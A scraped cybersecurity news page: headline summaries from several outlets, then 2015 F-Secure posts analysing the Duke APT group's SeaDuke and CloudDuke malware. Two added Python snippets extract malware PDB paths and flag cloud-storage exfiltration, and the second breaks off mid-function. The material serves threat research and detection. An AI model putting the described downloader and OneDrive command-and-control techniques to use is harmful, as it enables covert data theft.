Burp Suite 2025.1 Released, What’s New!

Burp Suite 2025.1 is packed with new features and enhancements designed to improve your web application testing workflow. This latest version brings upgrades like auto-pausing Burp Intruder attacks based on response content, exporting Collaborator interactions to CSV, highlighting Content-Length mismatches, a browser upgrade, and several bug fixes. Let’s dive into what’s new. Game-Changing Features […]

The post Burp Suite 2025.1 Released, What’s New! appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Chrome Security Update – Patch for 3 High-Severity Vulnerabilities

Google has released a critical update for the Chrome browser, addressing three high-severity security vulnerabilities. This patch, part of the latest Stable channel release, ensures users remain protected from potential threats. The new version, rolled out progressively, underscores Chrome’s commitment to providing a secure browsing environment. Users are urged to update their browsers promptly to […]

The post Chrome Security Update – Patch for 3 High-Severity Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

New Phishing Framework Attack Multiple Brands Login Pages To Steal Credentials

Researchers have identified a sophisticated phishing tactic leveraging Cloudflare’s workers.dev, a free domain name service, to execute credential theft campaigns. The modus operandi involves a generic phishing page that can impersonate any brand, with significant technical ingenuity aimed at deceiving unsuspecting users and evading detection. The phishing page, hosted on the URL “workers-playground-broken-king-d18b.supermissions.workers.dev,” is designed […]

The post New Phishing Framework Attack Multiple Brands Login Pages To Steal Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Weaponised XWorm RAT Builder Attacking Script Kiddies To Hack 18,000 Devices

A recent cybersecurity attack involving a Trojanized version of the XWorm Remote Access Trojan (RAT) builder has compromised over 18,000 devices worldwide. This sophisticated malware, primarily distributed via GitHub repositories, Telegram channels, and other platforms, has targeted cybersecurity novices, also known as “script kiddies,” who unknowingly downloaded malicious tools. Trojanized XWorm RAT Builder Exploits Over […]

The post Weaponised XWorm RAT Builder Attacking Script Kiddies To Hack 18,000 Devices appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

LockBit Ransomware: 11-Day Timeline from Initial Compromise to Deployment

A well-coordinated cyber intrusion, spanning 11 days, culminated in the deployment of LockBit ransomware across a corporate environment. The attack, which began with the execution of a malicious file posing as a Windows Media Configuration Utility, displayed a sophisticated playbook leveraging Cobalt Strike, advanced persistence mechanisms, lateral movement, data exfiltration tools, and an eventual ransomware […]

The post LockBit Ransomware: 11-Day Timeline from Initial Compromise to Deployment appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Open-source security spat leads companies to join forces for new tool

A company’s licensing change to a static analysis tool has forced 10 companies together to create Opengrep.

The post Open-source security spat leads companies to join forces for new tool appeared first on CyberScoop.

SonicWall pushes urgent patch for its SMA appliance

The flaw has a severity rating of 9.8 out of 10, and a patch has been made available.

The post SonicWall pushes urgent patch for its SMA appliance appeared first on CyberScoop.

DOJ indicts five in North Korean fake IT worker scheme

The department alleges that a North Carolina-based laptop farm enabled access for two North Korean nationals over the course of the scheme.

The post DOJ indicts five in North Korean fake IT worker scheme appeared first on CyberScoop.

New backdoor discovered that specifically targets Juniper routers

Researchers at Black Lotus Labs have uncovered an operation where a back door is dropped onto enterprise-grade Juniper Networks routers and listens for specific network signals, known as “magic packets,” to execute malicious commands. The campaign, which researchers at the cybersecurity wing of Lumen Technologies refer to as “J-Magic,” was active between mid-2023 and mid-2024. […]

The post New backdoor discovered that specifically targets Juniper routers appeared first on CyberScoop.

Removal of Cyber Safety Review Board members sparks alarm from cyber pros, key lawmaker

Not everyone opposed the move, however, even as the board reviews the major Salt Typhoon telecom breach.

The post Removal of Cyber Safety Review Board members sparks alarm from cyber pros, key lawmaker appeared first on CyberScoop.

BreachForums founder to be resentenced after court vacates previous punishment

Conor Fitzpatrick was initially sentenced to 20 years of supervised release following a guilty plea in July 2023.

The post BreachForums founder to be resentenced after court vacates previous punishment appeared first on CyberScoop.

‘Severe’ bug in ChatGPT’s API could be used to DDoS websites

The vulnerability, described by a researcher as “bad programming,” allows an attacker to send unlimited connection requests through ChatGPT’s API.

The post ‘Severe’ bug in ChatGPT’s API could be used to DDoS websites appeared first on CyberScoop.

Cloudflare detected (and blocked) the biggest DDoS attack on record

The company said that the 5.6 Tbps attack is indicative of the steady increase in the size of these attacks.

The post Cloudflare detected (and blocked) the biggest DDoS attack on record appeared first on CyberScoop.

Government battles against tech could leave consumers less secure

Courts and federal regulators too often treat consumers as bystanders, a Center for Cybersecurity Policy and Law expert argues.

The post Government battles against tech could leave consumers less secure appeared first on CyberScoop.

Ransomware groups pose as fake tech support over Teams

A researcher at Sophos told CyberScoop that the company observed these tactics being used against multiple individuals and at least 15 organizations.

The post Ransomware groups pose as fake tech support over Teams appeared first on CyberScoop.

Multiple Git flaws led to credentials compromise

Vulnerabilities in the Git credential retrieval protocol could have allowed threat actors to access user credentials. Security researcher RyotaK from GMO Flatt Security Inc discovered multiple vulnerabilities in the Git credential retrieval protocol that could have allowed threat actors to access user credentials. The vulnerabilities stem from the improper handling of messages in Git’s credential […]

GamaCopy targets Russia mimicking Russia-linked Gamaredon APT

New threat actor GamaCopy mimics Russia-linked Gamaredon APT in attacks on Russian-speaking targets. The Knownsec 404 Advanced Threat Intelligence team recently analyzed attacks on Russian-speaking targets using military-themed bait, 7z SFX for payloads, and UltraVNC, mimicking Gamaredon’s TTPs. The researchers linked the activity to the APT Core Werewolf (aka Awaken Likho, PseudoGamaredon); it mimics Gamaredon […]

ESXi ransomware attacks use SSH tunnels to avoid detection

Researchers at cybersecurity firm Sygnia warn that threat actors behind ESXi ransomware attacks target virtualized environments using SSH tunneling to avoid detection. Ransomware groups are exploiting unmonitored ESXi appliances to persist and access corporate networks. They use “living-off-the-land” techniques, leveraging […]

Attackers allegedly stole $69 million from cryptocurrency platform Phemex

Crooks stole at least $69 million from Singapore-based cryptocurrency platform Phemex in an alleged cyberattack, after which the platform paused operations. Phemex CEO Federico Variola stated they are restoring withdrawals and temporarily manually reviewing all requests. On Thursday, researchers at the blockchain security firm PeckShield noticed […]

Change Healthcare data breach exposed the private data of over half the U.S.

The Change Healthcare data breach is worse than initially estimated: approximately 190 million people have been affected. In October 2024, UnitedHealth Group announced that the data breach suffered by Change Healthcare in February 2024 impacted more than 100 million individuals. […]

SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 30

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape.

  • Gmail For Exfiltration: Malicious npm Packages Target Solana Private Keys and Drain Victims’ Wallets
  • Threat Bulletin: Weaponized Software Targets Chinese-Speaking Organizations
  • Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai
  • Sophos MDR […]

Security Affairs newsletter Round 508 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

  • Subaru Starlink flaw allowed experts to remotely hack cars
  • Participants in the Pwn2Own Automotive 2025 earned $886,250
  • U.S. […]

Cisco warns of a ClamAV bug with PoC exploit

Cisco has released security updates to address a ClamAV denial-of-service (DoS) vulnerability tracked as CVE-2025-20128. The Cisco PSIRT experts warn that proof-of-concept (PoC) exploit code is available for this flaw. The vulnerability resides in […]

Subaru Starlink flaw allowed experts to remotely hack cars

Subaru Starlink flaw exposed vehicles and customer accounts in the US, Canada, and Japan to remote attacks. Popular security researcher Sam Curry and his colleague Shubham Shah discovered a vulnerability in Subaru’s Starlink connected vehicle service that left vehicles and customer accounts in the US, Canada, and Japan susceptible to remote attacks. The experts explained […]

Participants in the Pwn2Own Automotive 2025 earned $886,250

The Pwn2Own Automotive 2025 hacking contest has ended, and participants earned $886,250 after demonstrating 49 zero-day flaws. Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) obtained 30.5 Master of Pwn points and won the Master of Pwn earning $222.250. […]

Future-Proof Your WordPress Site: Essential Plugins for 2025

The digital landscape is constantly growing and evolving. As such, some tips and tricks that worked for websites in 2023 might be obsolete in 2025. For any digital professional, remaining dedicated to top-quality practice that stands the test of time is just the start. This means staying ahead of the curve and leveraging the best […]

The post Future-Proof Your WordPress Site: Essential Plugins for 2025 appeared first on IT Security Guru.

Privacy Teams Understaffed, Under Resourced and Under Stress, Research Finds

New research by ISACA has revealed that more than two in five (45%) privacy professionals in Europe believe that their organisation’s privacy budget is underfunded, an increase from 41% in 2024. Worryingly, over half (54%) of privacy professionals expect budgets to decrease further in 2025. This may leave privacy teams under-resourced, understaffed and, in […]

The post Privacy Teams Understaffed, Under Resourced and Under Stress, Research Finds appeared first on IT Security Guru.

2024 Most Inspiring Women in Cyber Winners: Where Are They Now?

Over the past five years, The Most Inspiring Women in Cyber Awards have celebrated some of the most exceptional women from across the cybersecurity industry. From new starters and students to CEOs and CISOs, the awards aim to celebrate outstanding individuals at every level of the industry. No deed is too small for recognition and […]

The post 2024 Most Inspiring Women in Cyber Winners: Where Are They Now? appeared first on IT Security Guru.

SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise Applications

SandboxAQ is teaming up with Google Cloud to revolutionise how Large Quantitative Models (LQMs) are developed, integrated, and deployed in enterprise environments. The partnership will see SandboxAQ utilize Google Cloud’s advanced infrastructure as its preferred cloud platform and leverage the Google Cloud Marketplace to streamline access to its cutting-edge solutions. SandboxAQ’s LQMs are at the […]

The post SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise Applications appeared first on IT Security Guru.

Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025

Eskenzi PR are proud to announce that KnowBe4, Mimecast, Varonis, Bridewell, Certes, and Pentest Tools have joined BT as sponsors for this year’s Most Inspiring Women in Cyber Awards. The 5th annual event, held at the iconic BT Tower on the 26th February 2025, aims to celebrate trailblazers from across the cybersecurity industry who are […]

The post Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025 appeared first on IT Security Guru.

Open Banking Shortcomings Threaten UK Global Leadership Position Research Finds

APIContext has released its UK Open Banking API Performance 2023-2024 Report, the annual analysis of the performance of the open banking APIs exposed by the large CMA9 UK banks (the nine largest banks required by UK law to provide open banking services), traditional High Street banks, credit card providers, building societies, and new digital banks (neobanks). […]

The post Open Banking Shortcomings Threaten UK Global Leadership Position Research Finds appeared first on IT Security Guru.

Companies Double Down on AI and Supply Chain Security, According to Black Duck’s BSIMM15 Report

Organisations worldwide are ramping up efforts to tackle emerging security risks in artificial intelligence (AI) and software supply chains, according to the newly released BSIMM15 report from Black Duck. The report, which examines software security practices across 121 companies, reveals a sharp increase in activities aimed at strengthening defenses against evolving threats. Key findings from […]

The post Companies Double Down on AI and Supply Chain Security, According to Black Duck’s BSIMM15 Report appeared first on IT Security Guru.

KnowBe4 Research Confirms Effective Security Awareness Training Significantly Reduces Data Breaches

KnowBe4, the cybersecurity platform that comprehensively addresses human risk management, today released a new white paper that provides data-driven evidence on the effectiveness of security awareness training (SAT) in reducing data breaches. Over 17,500 data breaches from the Privacy Rights Clearinghouse database were analysed along with KnowBe4’s extensive customer data to quantify the impact of SAT […]

The post KnowBe4 Research Confirms Effective Security Awareness Training Significantly Reduces Data Breaches appeared first on IT Security Guru.

NXLog undergoes strategic leadership change

NXLog, a leading technology provider of log management solutions, announced the appointment of Harald Reisinger as its new Chief Executive Officer. Co-founder and former CEO Botond Botyánszki will transition to the Chief Technology Officer (CTO) role. Together, they will focus on driving innovation to extend the company’s product portfolio towards the rapidly growing observability and […]

The post NXLog undergoes strategic leadership change appeared first on IT Security Guru.

Memcyco Delivers Offensive Capabilities for Companies to Tackle Digital Impersonation Fraud

Digital impersonation attacks have always put companies on the defensive, but a new offering from the cybersecurity startup Memcyco promises to change that narrative. With the latest version of its platform, Memcyco offers sophisticated tools to block digital impersonation attacks and track them in real time, take down malicious websites, identify the perpetrators, and improve […]

The post Memcyco Delivers Offensive Capabilities for Companies to Tackle Digital Impersonation Fraud appeared first on IT Security Guru.

Three Big Reasons Ransomware Payments Are Up More Than 5X Over Last Year

If the mission of cybersecurity is to protect the organization from losses to cybercriminals, we are in deep trouble. Over the past year there has been a dramatic increase in...

The post Three Big Reasons Ransomware Payments Are Up More Than 5X Over Last Year appeared first on Cyber Defense Magazine.

The Rise in Phishing Scams

As cybersecurity platforms have become more effective, cyber attackers have shifted their strategy. Rather than challenging defense applications to identify weaknesses, they are now increasingly focused on exploiting human behavior....

The post The Rise in Phishing Scams appeared first on Cyber Defense Magazine.

The Relationship Between Network and Security: Why They’re Ditching the “It’s Your Fault” Game

Remember the good old days of IT? Back when firewalls were like bouncers at a nightclub, and security was a sleepy corner in the IT department? Those days are about...

The post The Relationship Between Network and Security: Why They’re Ditching the “It’s Your Fault” Game appeared first on Cyber Defense Magazine.

Revolutionizing Investigations: The Impact of AI in Digital Forensics

Artificial intelligence (AI) is making waves in many industries across the board. It found use in healthcare, manufacturing, retail, finance, and other sectors that deal with large volumes of data....

The post Revolutionizing Investigations: The Impact of AI in Digital Forensics appeared first on Cyber Defense Magazine.

The Frontier of Security: Safeguarding Non-Human Identities

Dropbox, Microsoft, Okta – not only are these all major software companies, but each of them has fallen victim to a supply chain attack due to a compromised non-human identity....

The post The Frontier of Security: Safeguarding Non-Human Identities appeared first on Cyber Defense Magazine.

The Cybersecurity Checklist: Top Methods and Tools for Protection And Mitigation

The rapid development of artificial intelligence (AI) is fueling an increase in cyber-attacks, threatening the data infrastructure of businesses and individuals. Approximately 85 percent of cybersecurity professionals attribute the increase...

The post The Cybersecurity Checklist: Top Methods and Tools for Protection And Mitigation appeared first on Cyber Defense Magazine.

The Age of Unseen Truths And Deceptive Lies

From the moment we’re born, we are surrounded by a mix of true and false information. In the past, distinguishing between them was relatively easy, but over time, it has...

The post The Age of Unseen Truths And Deceptive Lies appeared first on Cyber Defense Magazine.

Tagged Files as a Road to Insider Threats

An insider threat is any individual within a community who acts against that community, whether used for sabotage, diversion, espionage or other purposes. On the other...

The post Tagged Files as a Road to Insider Threats appeared first on Cyber Defense Magazine.

The Power of Many: Crowdsourcing as A Game-Changer for Modern Cyber Defense

With the rapid technological advancement and the world entering the AI era, the cyber threat landscape has significantly evolved in its complexity and sophistication. The frequency of data breaches has...

The post The Power of Many: Crowdsourcing as A Game-Changer for Modern Cyber Defense appeared first on Cyber Defense Magazine.

Operational Security: The Backbone of Effective Police Communication

In the fast-paced and dynamic world of law enforcement, effective communication is essential for ensuring public safety and successful operations. However, amidst the ever-evolving landscape of technology and threats, maintaining...

The post Operational Security: The Backbone of Effective Police Communication appeared first on Cyber Defense Magazine.

CVE-2025-23006: Critical Vulnerability Discovered in SonicWall SMA 1000 Series

Key Takeaways

  • Critical vulnerability discovered in SonicWall’s SMA 1000 series appliances, tracked as CVE-2025-23006.
  • Impacted products include Appliance Management Console (AMC) and Central Management Console (CMC) products, versions 12.4.3-02804 and earlier.
  • This vulnerability could allow a remote, unauthenticated attacker to execute arbitrary commands.
  • We recommend upgrading to version 12.4.3-02854 (platform-hotfix) or later immediately.

From Noise to Clarity: The Value of MalOp™ Technology in Modern Cyber Defense

"Out-of-the-Box" Detection Coverage: A Critical Metric for Endpoint Security

Back in the summer I wrote a blog around capability versus usability, in which I highlighted that industry testing typically focuses on capability, despite one of the key challenges in the industry being skills. EDR, by its nature, is a technical capability, and as such the skills gap in this space is even greater. I will always remember a good friend sharing in his keynote, a number of years ago, that there is little point in buying a best-of-breed solution if you don’t have the people power to actually use it.

In our recent SOC optimization research we saw that on average only 50-80% of alerts are processed the same day, with false positives being a significant challenge and distraction for SOC analysts.

CVE-2024-55956: Zero-Day Vulnerability in Cleo Software Could Lead to Data Theft

Key Takeaways

  • Zero-day vulnerability was discovered in 3 Cleo products, tracked as CVE-2024-55956
  • Cleo is the developer of various managed file transfer platforms with approximately 4,000 customers, mostly mid-sized organizations
  • CVE-2024-55956 could allow unauthenticated users to import and execute arbitrary Bash or PowerShell commands on host systems by leveraging default settings of the Autorun directory
  • Threat actor group, CL0P, has claimed responsibility for vulnerability exploitation with the goal of data theft
  • We recommend upgrading to version 5.8.0.24 immediately

Your Data Is Under New Lummanagement: The Rise of LummaStealer

Cybereason Security Services issues Threat Analysis reports to inform on high-impact threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, Cybereason Security Services investigates the rising activity of the malware LummaStealer.

Leader in SOC Efficiency and Operational Excellence in MITRE ATT&CK 2024 Results

As cyber threats grow in complexity, security teams find themselves struggling to distinguish true risk from the noise of relentless alerts. Today’s adversaries operate at a global scale and around the clock, targeting endpoints across Windows, Linux, and macOS environments with advanced ransomware and espionage techniques. In the recent 2024 MITRE ATT&CK® Enterprise Evaluation, Cybereason once again demonstrated why out-of-the-box detection coverage and operational efficiency matter more than ever.

Blog: 2025 predictions

2025 Predictions - Greg Day VP & Field CISO, Cybereason

Stellar Discovery of A New Cluster of Andromeda/Gamarue C2

Cybereason Security Services issues Threat Analysis reports to inform on high-impact threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

Cybereason Merges with Trustwave, Enhances MDR and Consulting Services

As the cyber threat landscape grows in complexity, organizations are increasingly turning to their cybersecurity partners for support. From tackling compliance mandates to actively ejecting threat actors from internal systems and helping raise organizational resilience, end-to-end cyber solutions are crucial.

Insourcing versus Outsourcing

One of the quotes often attributed to Albert Einstein is “Insanity is doing the same thing over and over again and expecting different results”. Whilst there’s debate if this was something Einstein actually said, the sentiment definitely rings true.

How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards

Scammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.

As retailers rush to capitalize on what is generally their most profitable time of year, they flood email boxes with great offers that are often time sensitive and may even seem too good to be true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.

Soon…

Posted by Sean @ 12:52 GMT


Our "construction project" is progressing nicely.

A work in progress

And it should resolve this…

Mobile usability issues

Fix mobile usability issues?

Translation: your site doesn't help us sell more Android phones and ads.

But whatever, the "issues" should be fixed soon enough.




On 18/08/15 At 12:52 PM

Work In Progress

Posted by Sean @ 13:25 GMT


Regular readers will have noticed it's been slow here of late.

Under Construction

We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.

More info coming soon.

In the meantime, you can still catch us on Twitter.




On 13/08/15 At 01:25 PM

"IOS Crash Report" Update: Safari Adds Block Feature

Posted by Sean @ 09:53 GMT


Ask, and sometimes, you shall receive.

Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.

Apple released iOS 9 Public Beta 2:

iOS 9 Public Beta 2, Install

And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.

iOS 9 Public, Safari Block Alerts

We tested a scam-site and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.

Kudos Apple! Looking forward to seeing this in iOS 9's general release.

Big hat tip to Rosyna Keller.




On 23/07/15 At 09:53 AM

Duke APT group's latest tools: cloud services and Linux support

Posted by Artturi @ 11:59 GMT


Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have borne a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.

Linux support added with the cross-platform SeaDuke malware

Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written in a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.

seaduke_crossplatform (39k image)
An example of the cross-platform support found in SeaDuke.

A new set of solutions with the CloudDuke malware toolset

Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:

C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb
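PDB paths like the ones above are the kind of artifact worth pulling out of samples automatically, since the "<Name>Solution" root directory ties otherwise different components to the same toolset. The following is an added example, not F-Secure's tooling: it scans a file for CodeView RSDS debug records (laid out as the "RSDS" signature, a 16-byte GUID, a 4-byte age and a NUL-terminated PDB path) and groups the paths by their "Solution" root. The sample bytes are constructed for the example and are not a real sample; only the naming pattern is taken from the strings listed above.

```python
import re
import struct
from collections import defaultdict
from typing import Dict, List, Optional

RSDS = b"RSDS"      # CodeView 7.0 debug record signature
MAX_PDB_PATH = 260  # longest path we are willing to accept after the header


def _cv_record(path: str) -> bytes:
    """Build a CodeView RSDS record: signature, GUID, age, NUL-terminated path.
    Used here only to construct the test fixture below."""
    guid = bytes(range(16))          # arbitrary GUID bytes for the fixture
    age = struct.pack("<I", 1)
    return RSDS + guid + age + path.encode("ascii") + b"\x00"


# Constructed stand-in for a PE file: a stub header, one RSDS record carrying a
# CloudDuke-style path, filler, and a stray "RSDS" that is not a record.
CONSTRUCTED_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + _cv_record(r"c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb")
    + b"\xcc" * 32
    + b"RSDS not a record"
)


def extract_pdb_paths(data: bytes) -> List[str]:
    """Return every PDB path found in RSDS records in `data`.

    Scanning for the signature instead of walking the PE debug directory keeps
    the code short and also works on unpacked memory dumps, at the price of
    possible false hits; the .pdb suffix check filters those out.
    """
    paths = []
    for m in re.finditer(re.escape(RSDS), data):
        start = m.end() + 16 + 4                       # skip GUID and age
        end = data.find(b"\x00", start, start + MAX_PDB_PATH + 1)
        if end == -1:
            continue
        try:
            path = data[start:end].decode("ascii")
        except UnicodeDecodeError:
            continue
        if path.lower().endswith(".pdb"):
            paths.append(path)
    return paths


# Root directory named "<Something>Solution", as in the observed strings.
SOLUTION_RE = re.compile(r"^[a-z]:\\(?P<solution>[A-Za-z0-9]+Solution)\\", re.IGNORECASE)


def solution_name(pdb_path: str) -> Optional[str]:
    """Return the 'solution' root of a CloudDuke-style PDB path, or None."""
    m = SOLUTION_RE.match(pdb_path)
    return m.group("solution") if m else None


def group_by_solution(pdb_paths: List[str]) -> Dict[str, List[str]]:
    """Group PDB paths by solution name; non-matching paths go under 'other'."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for p in pdb_paths:
        groups[solution_name(p) or "other"].append(p)
    return dict(groups)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else CONSTRUCTED_SAMPLE
    print(group_by_solution(extract_pdb_paths(data)))
```

Run it against a directory of samples and the "Solution" names become a cheap pivot: a new path under a known root is a candidate for the same toolset before any code analysis is done. Packed samples will not expose the record until unpacked, which is why scanning memory dumps is supported too.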

The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.

We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to functionally be an exact copy of SeaDuke with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.

bastion_z (12k image)
A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.

Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.

onedrive_z (7k image)
A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.

All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.

CloudDuke spear-phishing campaigns and similarities with CozyDuke

CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phishing emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file, while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".

decoy_ndi_small (63k image)
Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.

Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have borne a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, downloading and executing the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but directly in the execution of the "BastionSolution" component, thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.

decoy_fax (72k image)
The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.

Increasingly using cloud services to evade detection

CloudDuke is not the first time we have observed the Duke group use cloud services in general and Microsoft OneDrive specifically as part of their operations. Earlier this spring we released research on CozyDuke where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or alternatively CozyDuke downloading Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.

In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.

By relying solely on third-party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raise suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people transfer that same data every day for legitimate reasons? (Coincidentally, the implications of third-party web services being used as command and control channels are also the subject of an upcoming talk at the VirusBulletin 2015 conference.)
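The detection problem this paragraph describes is that the destination is legitimate, so the only signal left is whether a host's cloud-storage upload volume is out of line with its own history. Worked through in code as an added example, not F-Secure's tooling: the proxy log lines are constructed for the example, the cloud-storage hostnames are assumptions (a real list comes from the proxy's categorisation and the services actually in use), and the thresholds `ratio` and `min_bytes` are starting points to tune against a site's real baseline.

```python
from collections import defaultdict
from statistics import median
from typing import Dict, List, Tuple

# Hostnames treated as cloud storage. Assumption for the example only.
CLOUD_STORAGE_HOSTS = {"onedrive.live.com", "storage.live.com", "api.onedrive.com"}
UPLOAD_METHODS = {"PUT", "POST"}

# Constructed proxy log: "<date> <client> <host> <method> <bytes_out>".
# Not real telemetry. Client 10.1.1.21 uploads ~100 KB a day, then 48 MB.
CONSTRUCTED_LOG = """\
2015-07-13 10.1.1.20 onedrive.live.com PUT 120000
2015-07-13 10.1.1.21 onedrive.live.com PUT 90000
2015-07-14 10.1.1.20 onedrive.live.com PUT 110000
2015-07-14 10.1.1.21 onedrive.live.com PUT 95000
2015-07-15 10.1.1.20 onedrive.live.com PUT 130000
2015-07-15 10.1.1.21 onedrive.live.com PUT 100000
2015-07-16 10.1.1.20 onedrive.live.com PUT 115000
2015-07-16 10.1.1.21 storage.live.com PUT 48000000
2015-07-16 10.1.1.22 onedrive.live.com PUT 5000
2015-07-16 10.1.1.23 www.example.com POST 90000000
"""

Finding = Tuple[str, str, int]  # (client, reason, bytes uploaded that day)


def daily_cloud_uploads(log: str) -> Dict[str, Dict[str, int]]:
    """client -> ISO date -> bytes uploaded to cloud storage hosts that day."""
    totals: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for line in log.splitlines():
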